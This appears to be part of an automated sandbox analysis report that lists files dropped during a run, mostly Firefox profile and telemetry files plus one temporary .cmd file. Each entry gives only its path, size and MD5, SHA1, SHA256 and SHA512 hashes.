SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
3.0MB
MD5fc1e4df340c9005e05b8bfc96cec9e09
SHA1b443e9d3d0e35f97db505025d130ccb6646cd437
SHA2560c68affa8190af92aac6b35099f3e67659c42f6bc854a7d764a3a448eff2cb51
SHA5123a1cb04272ae35edbcae5211c02eca15735f63dfe0491158aee0565f226277810923b1f1cfca30dd594d926466628315454af466230f02d0b0f5d181fa3f2101
-
Filesize
1.3MB
MD515bdc4bd67925ef33b926843b3b8154b
SHA1646af399ef06ac70e6bd43afe0f978f0f51a75fd
SHA2564f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d
SHA512eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8
-
C:\Users\Admin\AppData\Local\Temp\{5d93a112-ec26-4d35-a4a9-74fb6d7c12d0}\dabe1ae6-b5de-45cb-9a42-b17594b268a4.cmd
Filesize695B
MD51f54edbcd87f47158e80fcb480d2b06d
SHA10beaf3e59c67506c97a95fbb2fcae830133ebc10
SHA256d168f5657c152ff715114a9a27888f40aace37a78e76ec01559d61e9754f5a16
SHA5120121bba46dbad74d88affbfc67b1abf07980c7f2e14cb692dae33d5e7dc164abe466692ccdd8ae5bc6ce4dbeec7353824390bb13db1d4a122393fce6e03f4d86
-
Filesize
2.6MB
MD53fb0ad61548021bea60cdb1e1145ed2c
SHA1c9b1b765249bfd76573546e92287245127a06e47
SHA2565d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1
SHA51238269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331
-
C:\Users\Admin\AppData\Local\Temp\{68f4c23a-4cbc-495e-983f-e8146fbc9b1b}\crls\c7e6bd7fe0e4965892ad706f0d2f42e88789b8041daf5b3eea9ca41785297798
Filesize367B
MD59cf88048f43fe6b203cf003706d3c609
SHA15a9aa718eb5369d640bf6523a7de17c09f8bfb44
SHA2564bdbe6ea7610c570bc481e23c45c38d61e8b45062e305356108fd21f384b75bb
SHA5121d0b42f31911ec8bd8eecc333674863794cfa2b97964cb511132f01a98afd0417b35423fb12461b10a786054f144e598f17d7546a1b17acc6c7efbce5f6f619e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\AlternateServices.bin
Filesize8KB
MD597fd352383e2ebef33a39d205072725f
SHA1e05fac7b8bb4dda2157d5a6d77aec7d0e7b3e10f
SHA2566dd68baf5540098e4b3e2429c30e7eb983dc835a38ad0a79cc6f955b006928fa
SHA5126143533b40d7d75ba5b0aaa600d1f2de371b67d8fb589f5c352651df508b8732c51d9588aeec8253edc2945c808bb6ba9e71be0af41d0e045a1d516513594cad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\SiteSecurityServiceState.bin
Filesize1KB
MD5ede94958f2bd074cd2b1e312e7cfe54a
SHA1632147ec988116fa95e9e4d0a8d30a093396b6f0
SHA256ee0d0c49db876f396c609a05079b0e673b3f7c328544609bfd6af25cf73e1b89
SHA51291210a38ff3078002cbf8f460a310ccb1b69ce8c1b52b77b684aecb59f798f4bc56c7031ec334b2034371ed9168b69a2d6e178e6b1f67c6fee145cee0c328cd5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD572f2da9b00a11617b63bba0a4037011e
SHA11173ac0b34f27d99d070e970669eda5ea003bb30
SHA25606a679e10a461b284c755975b28b75d23db59865617f3a0f531f952bbab7ad71
SHA5128c91b9c5e93b2a5fea8176f5496ab6fb2b05bdeb8054f79e279ccd9e65b4ffbcada11d587519bed248f87de23d026a9ce57a6f3bed7ea76535b3f79edafcea9b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5a2f0295ce9f7b1e4fea2d6d9ee03fad5
SHA13e79f39eea5e6a0e063bb1d76f13fe24a8806741
SHA25655453e0e2ca62d16f9df2e19fb1ca2a3a0644a851ddeb753fa6f244763389722
SHA512a3d0250fa93114d431f711436e95e11aab1ad511cad5d0b1302ce2268b22bd42803841c49232f4fa6c91651f2a03b6b5948ebfcd9a6ad2f615449ea8ff3a8f01
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD5ee346d63896c2a4ab50a56953c92a5e2
SHA11f29c172f6a81cb2dc926776e80b901cdca707ed
SHA2560559cbf9aab9803c3aa6ef05279516d34335705c0038d73e49cfc4d5c5e64112
SHA5123dc8d3792116e04639ec2f29248beefc38fb11bb9be23e2a847f878648f6fa3ce783fbfad650b378e46b6192ed55fc09495aa693501658c24affac370d155de3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\db\data.safe.tmp
Filesize3KB
MD5deab3ba4c0e1b43237c65afc5807c4a3
SHA19a58dc57a35ac64bec10c53effd8bc8b68d726d9
SHA256c96373d502980d09beccb8c03ce6dc392d0ab0ade750f67de179d34a0d990d68
SHA512d81a32cea7e1c1b29878cd22bd04f193b5d95274254fee4c4355421f40155bb79e8662eb9b9bf6672e5177dbd037c23a4ab5c0d0fa1a666ef82ae4b3c3328f2f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD5436c5e4a617f6e4258d570af666c7346
SHA13f353f52040b6de6e9be84f75136531f5ab4f785
SHA2566ab52be411bacaa44f4ac005fd335276dc8765b031096638a768e7cd887693fd
SHA5125ec02e26656c496b7a02e7fc9921e39e4ad03b4b212a27b709a0c19576052533851fab1772674329d0f8b43243946ff49f3d8ef12f6f885804aac9eaaeef07b3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\events\events
Filesize1KB
MD5caffc24bf18bea84a37b941f2964e866
SHA1574789fecd0cf8c14fe397178bea83a3215a2115
SHA25604bfa64122dae38c6c759340fa5da368a70743db137067a6825e4a1638914799
SHA5125e74264b190711b23f609a62ac18109568149ef0daf92351227694ddd705ca1872aa5f5eb4b37839ef913e5d768b76de24c49b6b289b10fd74c6a52d1f73cc8b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\28816e90-70ae-49d2-a4c1-eddff456c9f1
Filesize235B
MD5a0505662e0027627565c1a9caea52392
SHA145e667f137f0a2a8f0bb310c5a390f4067eba097
SHA25668a38ae15f2aa5f8f182e15afc1f1d266c9c58cab9787ce172176e7fdf3eccd4
SHA5126e0a1ddc2fefd3deb5955f383b248ff16c250d60c688c821858bc39b83182358739e914d31d5455978661562c4cbb973bfd79f9aa693ce3b173833803c690ae1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\290f528f-9941-4d25-b7cc-5acee9ec039a
Filesize883B
MD54c32087631b00896886934c4d72808d9
SHA17ada544707876493c7a9cc49abc6b363de53f691
SHA256b00f6706ac4106840d6e1a427701ed68705bd9fdcdd426ea031f111c1f555314
SHA512176c1d32c3bebed3e73c6f46d8a586f233666f300bec0c8ab2d81d117f8cc4816dff1e726fe7bc7dca049678e2da6998943e85a72e25e749ed8db135d534bc5d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\31caee7c-3358-4881-a58a-9b2850110d2e
Filesize16KB
MD57e7ed906f165df5fb8e55ea4d97b3737
SHA1075377724443a8598c81bccc4820751c8d4aa08d
SHA2566a7d3b1fa9233b45d6a36bfcdc9b7f431574e35ae62f40209f3d26ee1c96c3e7
SHA512350880d5ef8c02c40792c8388d1e801d35013e317f11c244ae2046e4204d10f471a27982751d59f374bf98098d3b33492f09064053baf3f1c83bd5ac12a7534d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\5c0405a3-c8fb-44b6-9fbc-3f45fd9ebe72
Filesize2KB
MD522472c7d8dc1f4c4b97eba5ca0c750ef
SHA1438a31c9ab484703e152cfad65c37b9e25ab4b3f
SHA2566f433b5dc6e50c2560931c52c7854dfe7cceacc71dc8f90f61efa8375595dea5
SHA51215a72b0e1299d34cc5bd8b1e993bd82cd86573e414a0e01c6ca557b78051926847c8bdee2a82f272ed9156c76c89b7cdbd74f0ec295ae98bc5dd116f8f3540d4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\ce6b1cb8-913a-4c86-8c03-00c22d956857
Filesize886B
MD54d6bca49118c300c2bc7a54a0c2318fe
SHA1b7ff6f1e992c10a64d1b57733d608ea8ec245d29
SHA2566a672dafcd331a57851413015af2294d1e6d8d851b666f176e883915cfb0e407
SHA5128af1dec49f27b3d8c260a571af8d179aa14f4a6b4b05f23e656b8c6a37f736fbd0663a7f64d8af628ad2b62ed2678b7ed314a313138187970a80e622432a24f8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\datareporting\glean\pending_pings\f6d5eb97-f227-4abf-8557-8c7d877fe56f
Filesize235B
MD52bad06e5b77c708f6db2e96ac6272261
SHA109c051996d85bc120a25e504cf87999b30688d9e
SHA25659a5279dea865d077d0302808454043a64dac299279c83deb0a6c359f849d5ea
SHA512b84f8a7221994c31777ac2148893ee8991f3e41c2350937b8d19ae0530d5d2d2ce637c50ec820f3cdb5f56923926fd7c33b28b7ed779b925d325112e1d4d7d26
-
Filesize
16KB
MD5981902d55d3e8e7bb13e541c341faaf6
SHA164f9f8853d94245f2b39cb8bc9e9dd2854b63f96
SHA256fa6f27f29ef405bfee0c9af42922ebe8167e0b264c3be8bc66c0fe19dfd84fc4
SHA5122f12c27ceae8b84a2992ac360dfbe04a6914eb34754ecb835f64c0945cb022934a03bc424bbb5f7860cd656376d6723ff0cd490cd93a81a8c617b3cf3e717eee
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
7KB
MD5edaa087ede71b0a09cd754f60450298c
SHA1adceebe27299929bce63f2c37f46e20076881e7a
SHA2563452cf2427ff115f301b062ed899689f2b36313d340b01961921a2f8c639d5c8
SHA5124d5e290f8557e2128d614694aff54b7779acccb725a9908dd827a9fee1547f6c715dfb96ef6c159f4140a08e2bdfe726b57140398916d7c556240b9b8b436cf4
-
Filesize
12KB
MD59074174afc4ad5d009b1dd82f2c741b1
SHA18c3ea836aa948dae376fd91e718af9872cef9a7f
SHA256ec09542ecb3260b2d93bd4dbb99dcac52616e41d37683fde67effeb9884ba9c6
SHA512103d97476d019aba9114aed8f0c22ce8d8136ce41a6b90e8ea918d153dbcb207578c3362e2675d89114c1f4448f75ff0c98e6002da5acc39e756190655d1663e
-
Filesize
6KB
MD58db2e071be0e08e500064461b983c1a6
SHA14532ff80aff6755fadc14ba11624ff96727e65b1
SHA256cd040e6f1bc38a84df92a44da882bdad82275d31daefd1acd087b08f02dd8706
SHA5125182e868c257335826c0b893bd8840b5b38b32a5298bfdfa352f75cdb022af133da69b9251597d00c97f951515e2dd19c7e8933882d55c6b1474af0b3d834b2c
-
Filesize
6KB
MD5a838c9a3a89b777788264b71ea916b27
SHA12848510991401fad1954d1ff8f98d1a90d9d2d81
SHA25697b637c197415feb765da9ab62c746cb654f1b6f7cb9fba2e33c1edc5f804cd3
SHA512ea446a04682a946e4ea47bd8e302bbcb69fc5971c3811144821cc4a18e2240281f6648844d527bce0ca29c38bf2baef3881ff2055b64cf74d67b937558db1195
-
Filesize
11KB
MD561704f4ee3144aded6617e787165bd5a
SHA161dadce7ec9441a890f96e4af080a96995e2bd34
SHA256b2f51f423e238447a1d8807e7225c464b08c649bb443839ec58fecb390340e0a
SHA512f3fac19d29a9a101b2039d3f5715ca543e04ccd6a7c0f4a42e114b6d02f761192ce152797ae59f16af4c02fafcc3dd858797e547aa430f76a3e3b340d13f9b76
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5442106a96a4f60e6db7adbf0e01cdaa3
SHA1fdcc30bc45306c9191441ba33ca780e7ab0f872e
SHA2562825e54765d04c16e6f5093428f1e39f8c43d363dd665ef48035bdb3ea5824b2
SHA5126dc5c3f0004e2961cf75fe63cba7c097a119469f3cd945df965a4af68382654c5013cc62b9812e8c55d10b737d4c1bad8cf966f35dd275244997ca65568621a5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize10.3MB
MD5a6cd1f6575a8ac7ff1e129efd86e4212
SHA19130d1ef25a1580be0e686ab1f3ee4c32b7084a1
SHA2565ce011b67b85e320333c641c538d61618a4c7dabbeb0d283e2325b60ff5eb0d8
SHA5125cf1f2987649e7e2659b313702605ef6d42768acf2a38758913faad0875b2185ecd442f73e35d76726a413f89d5f99108275ce3006727cae310553e6e93fad3a
-
Filesize
368KB
MD5990442d764ff1262c0b7be1e3088b6d3
SHA10b161374074ef2acc101ed23204da00a0acaa86e
SHA2566c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4
SHA512af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4
-
Filesize
355KB
MD59cfe1ced0752035a26677843c0cbb4e3
SHA1e8833ac499b41beb6763a684ba60333cdf955918
SHA2563bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA51229e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD566522d67917b7994ddfb5647f1c3472e
SHA1f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA2565da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968